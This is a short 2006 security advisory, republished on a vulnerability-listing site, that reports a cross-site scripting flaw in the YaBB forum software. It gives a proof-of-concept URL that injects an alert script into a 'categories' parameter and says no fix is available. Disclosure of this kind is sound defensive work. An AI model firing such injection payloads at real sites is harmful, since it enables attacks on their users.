Computer Security

Security Advisory: Yabb XSS

back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHPMyRing <= 4.2.0 (view_com.
php) Remote SQL Injection

  TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

  Directory Traversal vulnerability in IPCheck Monitor Server

  Mambo/Joomla Component Remository v3.25 (mosConfig_absolu
te_path) Remote File Inclusion Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:11.08.2006
Subject:Yabb XSS

########################################################################
###################

#Aria-Security.net Advisory #

#Discovered by: OUTLAW #

#< www.Aria-security.net > #

#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #

########################################################################
###################

#Software: YaBB

#Attack method: Cross Site Scripting

#

#

#Proof of Concept:

#

#index.
php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert(
"xss
")</script>

#

#----------------------------------------------------------

#

#Solution

#

#No Solutions

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]

#
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru